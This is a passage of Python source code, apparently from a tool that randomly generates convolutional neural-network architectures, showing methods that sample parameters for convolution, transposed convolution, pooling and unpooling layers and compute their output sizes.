self.layer_id += [dropout_type] # append to the layer-id list
self.layer_num += 1
#add pool/unpool layers
#add a Pool layer
if random.randint(1,100) >= 80:
params = self.make_layer(7,last_layer_input_size,final_output_size)
output_size = params[4:8]
last_layer_input_size = output_size
self.layer_parameters += params #append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [7] # append to the layer-id list
self.layer_num += 1
pool_type = params[-1]
if pool_type == 0 and random.randint(1,100) <= 10:
params = self.make_layer(10,last_layer_input_size,final_output_size)
output_size = params[4:8]
last_layer_input_size = output_size
self.layer_parameters += params #append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [10] # append to the layer-id list
self.layer_num += 1
else:
params = self.make_layer(13,last_layer_input_size,final_output_size)
output_size = params[4:8]
last_layer_input_size = output_size
self.layer_parameters += params #append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [13] # append to the layer-id list
self.layer_num += 1
return self.layer_num - 1 #return the index of the last node of this linear sequence
def make_linear_layers_1d(self,last_block_index,input_size,final_output_size):
'''
Generates a linear (branch-free) CNN sub-block, for example:
nn.Conv2d(1, 6, 3, padding=1),
nn.BatchNorm2d(6), or dropout
nn.ReLU(True),
nn.MaxPool2d(2, 2)
'''
# print("generating make_linear_layers_1d...",input_size,final_output_size)
no_conv_prob = 0.1
more_conv_prob = 0.2
max_conv_num = 3
last_layer_input_size = input_size
if(random.randint(1,100) > no_conv_prob*100 or input_size[1] != final_output_size[1]):
#use conv layers; if omitted, a pool layer substitutes and the following ReLU etc. are skipped
#this is only allowed when the channel counts match, otherwise the conv layer cannot be dropped
conv_num = 1
while random.randint(1,100) <= 20:
#decide how many conv layers to stack
conv_num += 1
if(conv_num == max_conv_num):
break
# print(conv_num)
#add the conv layers
for i in range(0,conv_num):
ConvTranspose = False
if(i==conv_num-1):
#the last layer must match the target channel count
params = self.make_layer(0,last_layer_input_size,final_output_size)
else:
if random.randint(1,100) <= 20:
#conv layer
params = self.make_layer(0,last_layer_input_size)
else:
#transposed conv layer
params = self.make_layer(3,last_layer_input_size)
ConvTranspose = True
output_size = params[3:6]
last_layer_input_size = output_size
self.layer_parameters += params #append to the parameter vector
if(i==0):
#takes the merge node of the previous block as input
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
else:
#takes the previous node as input
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
if ConvTranspose:
self.layer_id += [3] # append to the layer-id list
self.layer_num += 1
else:
self.layer_id += [0] # append to the layer-id list
self.layer_num += 1
ConvTranspose = False
#add a BatchNorm or dropout layer
if(random.randint(1,100) < self.batchNorm_prob*100):
#add BatchNorm
params = self.make_layer(15,last_layer_input_size)
self.layer_parameters += params #append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [15] # append to the layer-id list
self.layer_num += 1
else:
if(random.randint(1,100) < self.dropout_prob*100):
#add Dropout
dropout_type = 18
params = self.make_layer(dropout_type,last_layer_input_size)
self.layer_parameters += params #append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [dropout_type] # append to the layer-id list
self.layer_num += 1
#add an activation layer
params = self.make_layer(22,last_layer_input_size)
self.layer_parameters += params #append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # append to the layer-id list
self.layer_num += 1
#add pool/unpool layers
#add a Pool layer
if random.randint(1,100) >= 20:
params = self.make_layer(6,last_layer_input_size,final_output_size)
output_size = params[3:6]
last_layer_input_size = output_size
self.layer_parameters += params #append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [6] # append to the layer-id list
self.layer_num += 1
pool_type = params[-1]
if pool_type == 0 and random.randint(1,100) <= 20:
params = self.make_layer(9,last_layer_input_size,final_output_size)
output_size = params[3:6]
last_layer_input_size = output_size
self.layer_parameters += params #append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [9] # append to the layer-id list
self.layer_num += 1
else:
params = self.make_layer(12,last_layer_input_size,final_output_size)
output_size = params[3:6]
last_layer_input_size = output_size
self.layer_parameters += params #append to the parameter vector
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [12] # append to the layer-id list
self.layer_num += 1
return self.layer_num - 1 #return the index of the last node of this linear sequence
def make_layer(self,layer_id,input_size,output_size=None,add_num=None,out_channels=None):
# print(layer_id,input_size,output_size)
'''
layer_id: id of the neural-network layer
input_size: list
returns the parameter vector
'''
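#Layout of the returned vector, shown for layer_id == 1 (Conv2d) as an
#example: input_size (4 entries) + output_size (4) + [in_channels,
#out_channels, kernel_h, kernel_w, stride_h, stride_w, padding_h, padding_w,
#dilation_h, dilation_w, groups] (11) = 19 entries, matching
#get_params_length below.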
# print(layer_id,input_size,output_size)
if(layer_id == 0):
# print("make conv2d...")
#现在写的是kernel_size是正方形或者立方体
input_length = input_size[2]
in_channels,out_channels,kernel_size,stride_size,padding_size,dilation_size,groups = [0 for index in range(7)]
in_channels = input_size[1]
# print(in_channels,'in_channels start')
if(output_size==None):
if(in_channels <= 3):
out_channels = random.randint(32,64)
else:
out_channels = random.randint(int(in_channels*2),in_channels*3)
output_size = [0,0,0]
output_size = [input_size[0],out_channels,input_length]
else:
out_channels = output_size[1]
#generate the kernel size
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
#generate the dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
common_divisor = self.get_common_divisor(in_channels,out_channels)
if(len(common_divisor) == 1):
#the only common divisor is 1
groups = 1
else:
groups = self.prob_random(common_divisor,[0.95]+[(1-0.95)/(len(common_divisor)-1) for i in range(len(common_divisor)-1)])
#generate stride and padding
if(output_size==None):
stride_size = 1
padding_size = random.randint(0,kernel_size)
#compute output_size
out_length = (input_length + 2*padding_size - dilation_size*(kernel_size-1) - 1)/(stride_size) + 1
output_size = [input_size[0],out_channels,out_length]
else:
#solve for integer stride_size and padding_size given kernel_size and dilation_size
out_length = output_size[2]
in_length = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
assert find_count < 200, "could not find a suitable network layer"
for p in range(0,int(kernel_size/2)+1):
stride_size = (in_length + 2*p - dilation_size*(kernel_size-1) - 1)/(out_length - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
# print(in_channels,'in_channels')
return [int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size,stride_size,padding_size,dilation_size,groups]]
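#Worked example of the 1-D output formula above, with illustrative numbers:
#input_length = 100, kernel_size = 3, padding = 1, dilation = 1, stride = 1
#gives out_length = (100 + 2*1 - 1*(3-1) - 1)/1 + 1 = 100, i.e. a "same"
#convolution.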
elif(layer_id == 1):
# print('1conv2d',input_size,output_size)
low_channel_prob = 0.5
# print("make conv2d...")
#kernel_size is currently square/cubic (identical along every spatial dim)
input_height = input_size[2]
input_width = input_size[3]
in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,dilation_height,dilation_width,groups = [0 for index in range(11)]
in_channels = input_size[1]
# print(in_channels,'in_channels start')
if(output_size==None):
if(in_channels <= 3):
out_channels = random.randint(32,64)
else:
# print(int(in_channels/0.8),int(in_channels*1.2))
out_channels = random.randint(int(in_channels*0.8),int(in_channels*1.2))
# if self.large == 1 and out_channels > 600:
# out_channels = self.prob_random([int(out_channels/6),int(out_channels/5),int(out_channels/4)],[0.3,0.5,0.2])
# elif self.large == 0 and out_channels > 200:
out_channels = self.prob_random([int(out_channels/6),int(out_channels/5),int(out_channels/4)],[0.3,0.5,0.2])
output_size = [0,0,0,0]
output_size = [input_size[0],out_channels,input_height,input_width]
else:
out_channels = output_size[1]
#generate a square kernel (equal height and width)
# print('2conv2d',input_size,output_size)
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.78,0.05,0.1,0.04,0.01,0.01,0.01])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
#generate a dilation with equal height and width
dilation_size = self.prob_random([1,2],[0.95,0.05])
dilation_height,dilation_width = dilation_size,dilation_size
common_divisor = self.get_common_divisor(in_channels,out_channels)
if(len(common_divisor) == 1):
#the only common divisor is 1
groups = 1
else:
groups = self.prob_random(common_divisor,[0.95]+[(1-0.95)/(len(common_divisor)-1) for i in range(len(common_divisor)-1)])
#generate stride and padding
if(output_size==None):
stride_size = 1
stride_height,stride_width = stride_size,stride_size
padding_size = random.randint(0,kernel_size)
padding_height,padding_width = padding_size,padding_size
#compute output_size
out_height = math.floor((input_height + 2*padding_height - dilation_height*(kernel_size_height-1) - 1)/(stride_height) + 1)
out_width = math.floor((input_width + 2*padding_width - dilation_width*(kernel_size_width-1) - 1)/(stride_width) + 1)
output_size = [input_size[0],out_channels,out_height,out_width]
else:
#solve for integer stride_size and padding_size given kernel_size and dilation_size
out_height = output_size[2]
in_height = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
assert find_count < 200, "could not find a suitable network layer"
for p in range(0,int(kernel_size/2)+1):
stride_size = (in_height + 2*p - dilation_size*(kernel_size-1) - 1)/(out_height - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
padding_height,padding_width = padding_size,padding_size
stride_height,stride_width = stride_size,stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
# print(in_channels,'in_channels')
return [int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,dilation_height,dilation_width,groups]]
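#Worked example of the integer stride/padding search above (illustrative
#numbers): for in_height = 32, out_height = 16, dilation = 1 and
#kernel_size = 3, (32 + 2p - 3)/15 is not a positive integer for p in
#{0, 1}, so the kernel is re-sampled; kernel_size = 2 with p = 0 then gives
#stride = (32 + 0 - 1 - 1)/15 = 2.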
elif(layer_id == 2):
# print("make conv2d...")
#现在写的是kernel_size是正方形或者立方体
input_depth = input_size[2]
input_height = input_size[3]
input_width = input_size[4]
in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,\
stride_height,stride_width,padding_depth,padding_height,padding_width,dilation_depth,dilation_width,dilation_height,\
groups = [0 for index in range(15)]
in_channels = input_size[1]
# print(in_channels,'in_channels start')
if(output_size==None):
if(in_channels <= 3):
out_channels = random.randint(32,64)
else:
out_channels = random.randint(int(in_channels*2),in_channels*3)
output_size = [0,0,0,0,0]
output_size = [input_size[0],out_channels,input_depth,input_height,input_width]
else:
out_channels = output_size[1]
#generate a cubic kernel (identical sides)
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
kernel_size_depth,kernel_size_height,kernel_size_width = kernel_size,kernel_size,kernel_size
#generate a dilation with identical sides
dilation_size = self.prob_random([1,2],[0.95,0.05])
dilation_depth,dilation_height,dilation_width = dilation_size,dilation_size,dilation_size
common_divisor = self.get_common_divisor(in_channels,out_channels)
if(len(common_divisor) == 1):
#the only common divisor is 1
groups = 1
else:
groups = self.prob_random(common_divisor,[0.95]+[(1-0.95)/(len(common_divisor)-1) for i in range(len(common_divisor)-1)])
# print('in_channels,out_channels,common_divisor',in_channels,out_channels,common_divisor)
#generate stride and padding
if(output_size==None):
stride_size = 1
stride_depth,stride_height,stride_width = stride_size,stride_size,stride_size
padding_size = random.randint(0,kernel_size)
padding_depth,padding_height,padding_width = padding_size,padding_size,padding_size
#compute output_size
out_depth = (input_depth + 2*padding_depth - dilation_depth*(kernel_size_depth-1) - 1)/(stride_depth) + 1
out_height = (input_height + 2*padding_height - dilation_height*(kernel_size_height-1) - 1)/(stride_height) + 1
out_width = (input_width + 2*padding_width - dilation_width*(kernel_size_width-1) - 1)/(stride_width) + 1
output_size = [input_size[0],out_channels,out_depth,out_height,out_width]
else:
#solve for integer stride_size and padding_size given kernel_size and dilation_size
#first solve for height and width
out_height = output_size[3]
in_height = input_size[3]
find = False
find_count = 0
while not find:
find_count += 1
assert find_count < 200, "could not find a suitable network layer"
for p in range(0,int(kernel_size/2)+1):
stride_size = (in_height + 2*p - dilation_size*(kernel_size-1) - 1)/(out_height - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
padding_height,padding_width = padding_size,padding_size
stride_height,stride_width = stride_size,stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
out_depth = output_size[2]
in_depth = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
assert find_count < 200, "could not find a suitable network layer"
for p in range(0,int(kernel_size/2)+1):
stride_size = (in_depth + 2*p - dilation_size*(kernel_size-1) - 1)/(out_depth - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
padding_depth = padding_size
stride_depth = stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_depth = kernel_size
# print(in_channels,'in_channels')
return [int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width,dilation_depth,dilation_width,dilation_height,groups]]
elif(layer_id == 3):
# print(output_size,'output_size')
assert output_size==None,"transposed conv layers only support output_size == None"
input_length = input_size[2]
in_channels,out_channels,kernel_size,stride,padding,output_padding,dilation,groups = [0 for index in range(8)]
in_channels = input_size[1]
if(output_size==None):
if(in_channels <= 3):
out_channels = random.randint(16,64)
else:
out_channels = random.randint(int(in_channels*2),in_channels*3)
output_size = [0,0,0,0]
output_size = [input_size[0],out_channels,input_length]
#generate the kernel size
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
#generate the dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
common_divisor = self.get_common_divisor(in_channels,out_channels)
output_padding_size = 0
if(len(common_divisor) == 1):
#the only common divisor is 1
groups = 1
else:
groups = self.prob_random(common_divisor,[0.95]+[(1-0.95)/(len(common_divisor)-1) for i in range(len(common_divisor)-1)])
#generate stride and padding
if(True):
stride_size = 1
padding_size = random.randint(0,kernel_size)
output_length = output_padding_size + stride_size*(input_length - 1) - 2*padding_size + dilation_size*(kernel_size - 1) + 1
#compute output_size
output_size = [input_size[0],out_channels,output_length]
# print([int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size,stride_size,padding_size,output_padding_size,dilation_size,groups]])
return [int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size,stride_size,padding_size,output_padding_size,dilation_size,groups]]
elif(layer_id == 4):
#since the size cannot be scaled by an exact factor, only output_size = None is supported for now
# print(output_size,'output_size')
assert output_size==None,"transposed conv layers only support output_size == None"
input_height = input_size[2]
input_width = input_size[3]
in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,\
stride_width,padding_height,padding_width,dilation,groups,output_padding_height,output_padding_width = [0 for index in range(12)]
in_channels = input_size[1]
if(output_size==None):
if(in_channels <= 3):
out_channels = random.randint(16,64)
else:
out_channels = random.randint(int(in_channels*2),in_channels*3)
output_size = [0,0,0,0]
output_size = [input_size[0],out_channels,input_height,input_width]
#generate a square kernel (equal height and width)
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
#generate a dilation with equal height and width
dilation_size = self.prob_random([1,2],[0.95,0.05])
common_divisor = self.get_common_divisor(in_channels,out_channels)
output_padding_height = 0
output_padding_width = 0
if(len(common_divisor) == 1):
#the only common divisor is 1
groups = 1
else:
groups = self.prob_random(common_divisor,[0.95]+[(1-0.95)/(len(common_divisor)-1) for i in range(len(common_divisor)-1)])
#generate stride and padding
if(True):
stride_size = 1
stride_height,stride_width = stride_size,stride_size
padding_size = random.randint(0,kernel_size)
padding_height,padding_width = padding_size,padding_size
output_height = output_padding_height + stride_height*(input_height - 1) - 2*padding_height + dilation_size*(kernel_size_height - 1) + 1
output_width = output_padding_width + stride_width*(input_width - 1) - 2*padding_width + dilation_size*(kernel_size_width - 1) + 1
# output_padding_height = output_height - stride_height*(input_height - 1) + 2*padding_height - dilation_size*(kernel_size_height - 1) - 1
# output_padding_width = output_width - stride_width*(input_width - 1) + 2*padding_width - dilation_size*(kernel_size_width - 1) - 1
#compute output_size
output_size = [input_size[0],out_channels,output_height,output_width]
# print([int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,output_padding_height,output_padding_width,dilation_size,groups]])
return [int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,output_padding_height,output_padding_width,dilation_size,groups]]
# return nn.ConvTranspose2d(in_channels,out_channels,(kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),\
# padding=(padding_height, padding_width),output_padding=(output_padding_height,output_padding_width),dilation=dilation,groups=groups)
elif(layer_id == 5):
# print(output_size,'output_size')
assert output_size==None,"transposed conv layers only support output_size == None"
input_depth = input_size[2]
input_height = input_size[3]
input_width = input_size[4]
in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,\
stride_height,stride_width,padding_depth,padding_height,padding_width,output_padding_depth,output_padding_height,output_padding_width,\
dilation,groups = [0 for index in range(16)]
in_channels = input_size[1]
if(output_size==None):
if(in_channels <= 3):
out_channels = random.randint(16,64)
else:
out_channels = random.randint(int(in_channels*2),in_channels*3)
output_size = [0,0,0,0]
output_size = [input_size[0],out_channels,input_depth,input_height,input_width]
#generate a cubic kernel (identical sides)
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
kernel_size_depth,kernel_size_height,kernel_size_width = kernel_size,kernel_size,kernel_size
#generate a dilation with identical sides
dilation_size = self.prob_random([1,2],[0.95,0.05])
common_divisor = self.get_common_divisor(in_channels,out_channels)
output_padding_height = 0
output_padding_width = 0
output_padding_depth = 0
if(len(common_divisor) == 1):
#the only common divisor is 1
groups = 1
else:
groups = self.prob_random(common_divisor,[0.95]+[(1-0.95)/(len(common_divisor)-1) for i in range(len(common_divisor)-1)])
#generate stride and padding
if(True):
stride_size = 1
stride_height,stride_width,stride_depth = stride_size,stride_size,stride_size
padding_size = random.randint(0,kernel_size)
padding_depth,padding_height,padding_width = padding_size,padding_size,padding_size
output_depth = output_padding_depth + stride_depth*(input_depth - 1) - 2*padding_depth + dilation_size*(kernel_size_depth - 1) + 1
output_height = output_padding_height + stride_height*(input_height - 1) - 2*padding_height + dilation_size*(kernel_size_height - 1) + 1
output_width = output_padding_width + stride_width*(input_width - 1) - 2*padding_width + dilation_size*(kernel_size_width - 1) + 1
# output_padding_height = output_height - stride_height*(input_height - 1) + 2*padding_height - dilation_size*(kernel_size_height - 1) - 1
# output_padding_width = output_width - stride_width*(input_width - 1) + 2*padding_width - dilation_size*(kernel_size_width - 1) - 1
#compute output_size
output_size = [input_size[0],out_channels,output_depth,output_height,output_width]
# print([int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,\
# stride_height,stride_width,padding_depth,padding_height,padding_width,output_padding_depth,output_padding_height,output_padding_width,\
# dilation_size,groups]])
return [int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,\
stride_height,stride_width,padding_depth,padding_height,padding_width,output_padding_depth,output_padding_height,output_padding_width,\
dilation_size,groups]]
# return nn.ConvTranspose3d(in_channels,out_channels,(kernel_size_depth, kernel_size_height, kernel_size_width), stride=(stride_depth, stride_height, stride_width),\
# padding=(padding_depth, padding_height, padding_width),output_padding=(output_padding_depth, output_padding_height, output_padding_width),dilation=dilation,groups=groups)
elif(layer_id == 6):
#max pooling would additionally need to return indices
input_length = input_size[2]
input_channels = input_size[1]
kernel_size,stride_size,padding_size,dilation_size,pool_type = [0 for index in range(5)]
pool_type = random.randint(0,1)
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
#generate the dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
if(pool_type == 1):
dilation_size = 1
if(output_size==None):
# stride_size = self.prob_random([1,2,3],[0.6,0.3,0.1])
stride_size = 1
padding_size = random.randint(0,kernel_size)
#compute output_size
out_length = (input_length + 2*padding_size - dilation_size*(kernel_size-1) - 1)/(stride_size) + 1
output_size = [input_size[0],input_channels,out_length]
else:
#solve for integer stride_size and padding_size given kernel_size and dilation_size
out_length = output_size[2]
input_length = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "could not find a suitable network layer"
for p in range(0,int(kernel_size/2)+1):
stride_size = (input_length + 2*p - dilation_size*(kernel_size-1) - 1)/(out_length - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
return [int(i) for i in input_size+output_size+[kernel_size,stride_size,padding_size,dilation_size,pool_type]]
elif(layer_id == 7):
#max pooling would additionally need to return indices
input_height = input_size[2]
input_width = input_size[3]
input_channels = input_size[1]
kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,dilation_height,dilation_width,pool_type = [0 for index in range(9)]
pool_type = random.randint(0,1)
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
#generate a dilation with equal height and width
dilation_size = self.prob_random([1,2],[0.95,0.05])
dilation_height,dilation_width = dilation_size,dilation_size
if(pool_type == 1):
dilation_height,dilation_width = 1,1
if(output_size==None):
# stride_size = self.prob_random([1,2,3],[0.6,0.3,0.1])
stride_size = 1
stride_height,stride_width = stride_size,stride_size
padding_size = 0
padding_height,padding_width = padding_size,padding_size
#compute output_size
out_height = math.floor((input_height + 2*padding_height - dilation_height*(kernel_size_height-1) - 1)/(stride_height) + 1)
out_width = math.floor((input_width + 2*padding_width - dilation_width*(kernel_size_width-1) - 1)/(stride_width) + 1)
output_size = [input_size[0],input_channels,out_height,out_width]
else:
#solve for integer stride_size and padding_size given kernel_size and dilation_size
out_height = output_size[2]
in_height = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "could not find a suitable network layer"
for p in range(0,int(kernel_size/2)+1):
stride_size = (in_height + 2*p - dilation_size*(kernel_size-1) - 1)/(out_height - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
padding_height,padding_width = padding_size,padding_size
stride_height,stride_width = stride_size,stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
return [int(i) for i in input_size+output_size+[kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,dilation_height,dilation_width,pool_type]]
elif(layer_id == 8):
#max pooling would additionally need to return indices
input_depth = input_size[2]
input_height = input_size[3]
input_width = input_size[4]
input_channels = input_size[1]
kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,\
stride_width,padding_depth,padding_height,padding_width,dilation_depth,dilation_height,dilation_width,pool_type = [0 for index in range(13)]
pool_type = random.randint(0,1)
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
kernel_size_depth,kernel_size_height,kernel_size_width = kernel_size,kernel_size,kernel_size
#generate a dilation with identical sides
dilation_size = self.prob_random([1,2],[0.95,0.05])
dilation_depth,dilation_height,dilation_width = dilation_size,dilation_size,dilation_size
if(pool_type == 1):
dilation_depth,dilation_height,dilation_width = 1,1,1
if(output_size==None):
# stride_size = self.prob_random([1,2,3],[0.6,0.3,0.1])
stride_size = 1
stride_depth,stride_height,stride_width = stride_size,stride_size,stride_size
padding_size = random.randint(0,kernel_size)
padding_depth,padding_height,padding_width = padding_size,padding_size,padding_size
#compute output_size
out_depth = (input_depth + 2*padding_depth - dilation_depth*(kernel_size_depth-1) - 1)/(stride_depth) + 1
out_height = (input_height + 2*padding_height - dilation_height*(kernel_size_height-1) - 1)/(stride_height) + 1
out_width = (input_width + 2*padding_width - dilation_width*(kernel_size_width-1) - 1)/(stride_width) + 1
output_size = [input_size[0],input_channels,out_depth,out_height,out_width]
else:
#solve for integer stride_size and padding_size given kernel_size and dilation_size
out_height = output_size[3]
in_height = input_size[3]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "could not find a suitable network layer"
for p in range(0,int(kernel_size/2)+1):
stride_size = (in_height + 2*p - dilation_size*(kernel_size-1) - 1)/(out_height - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
padding_height,padding_width = padding_size,padding_size
stride_height,stride_width = stride_size,stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
out_depth = output_size[2]
in_depth = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "could not find a suitable network layer"
for p in range(0,int(kernel_size/2)+1):
stride_size = (in_depth + 2*p - dilation_size*(kernel_size-1) - 1)/(out_depth - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
padding_depth = padding_size
stride_depth = stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_depth = kernel_size
return [int(i) for i in input_size+output_size+[kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,\
stride_width,padding_depth,padding_height,padding_width,dilation_depth,dilation_height,dilation_width,pool_type]]
elif(layer_id == 9):
input_channels = input_size[1]
input_length = input_size[2]
kernel_size,stride_size,padding_size = [0 for index in range(3)]
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
if(output_size==None):
# stride_size = self.prob_random([1,2,3],[0.6,0.3,0.1])
stride_size = 1
padding_size = random.randint(0,kernel_size)
#compute output_size
out_length = (input_length-1)*stride_size - 2*padding_size + kernel_size
output_size = [input_size[0],input_channels,out_length]
else:
#solve for an integer stride_size and padding_size given kernel_size
out_length = output_size[2]
input_length = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "could not find a suitable network layer"
for padding in range(0,int(kernel_size/2)+1):
stride_size = (2*padding - kernel_size + out_length) / (input_length-1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = padding
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
return [int(i) for i in input_size+output_size+[kernel_size,stride_size,padding_size]]
# return nn.MaxUnpool2d(kernel_size = (kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),padding=(padding_height, padding_width))
# return nn.MaxUnpool1d(kernel_size = kernel_size, stride=stride, padding=padding)
elif(layer_id == 10):
input_channels = input_size[1]
input_height = input_size[2]
input_width = input_size[3]
kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width = [0 for index in range(6)]
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
if(output_size==None):
# stride_size = self.prob_random([1,2,3],[0.6,0.3,0.1])
stride_size = 1
stride_height,stride_width = stride_size,stride_size
padding_size = random.randint(0,kernel_size)
padding_height,padding_width = padding_size,padding_size
#compute output_size
out_height = (input_height-1)*stride_height - 2*padding_height + kernel_size_height
out_width = (input_width-1)*stride_width - 2*padding_width + kernel_size_width
output_size = [input_size[0],input_channels,out_height,out_width]
else:
#solve for an integer stride_size and padding_size given kernel_size
out_height = output_size[2]
in_height = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "could not find a suitable network layer"
for padding in range(0,int(kernel_size/2)+1):
stride_size = (2*padding - kernel_size_height + out_height) / (input_height-1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = padding
padding_height,padding_width = padding_size,padding_size
stride_height,stride_width = stride_size,stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
return [int(i) for i in input_size+output_size+[kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width]]
# return nn.MaxUnpool2d(kernel_size = (kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),padding=(padding_height, padding_width))
elif(layer_id == 11):
input_channels = input_size[1]
input_depth = input_size[2]
input_height = input_size[3]
input_width = input_size[4]
kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width = [0 for index in range(9)]
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
kernel_size_depth,kernel_size_height,kernel_size_width = kernel_size,kernel_size,kernel_size
if(output_size==None):
# stride_size = self.prob_random([1,2,3],[0.6,0.3,0.1])
stride_size = 1
stride_depth,stride_height,stride_width = stride_size,stride_size,stride_size
